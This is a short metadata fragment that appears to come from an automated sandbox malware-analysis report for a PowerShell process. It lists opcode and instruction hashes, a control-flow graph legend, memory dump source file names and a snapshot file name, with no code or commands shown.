                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6fed41d74bfa81da25edd7feafdfb3a3b4539e4c25a85360b45ac8d82a4a79da
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3f44128ccc4e8afa1e51855ab5396204a4b11b038b33c013fd36a4dbdb534fe5
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fed41d74bfa81da25edd7feafdfb3a3b4539e4c25a85360b45ac8d82a4a79da
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0318471908A1C9FDB58DF9CC849AF9BBE0FF65321F10426FD009E3652DB7468158B91

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2320397532.00007FFEB3790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3790000, based on PE: false
Memory Dump Source
• Source File: 00000023.00000002.2328660623.00007FFEB38F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB38F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_7ffeb38f0000_powershell.jbxd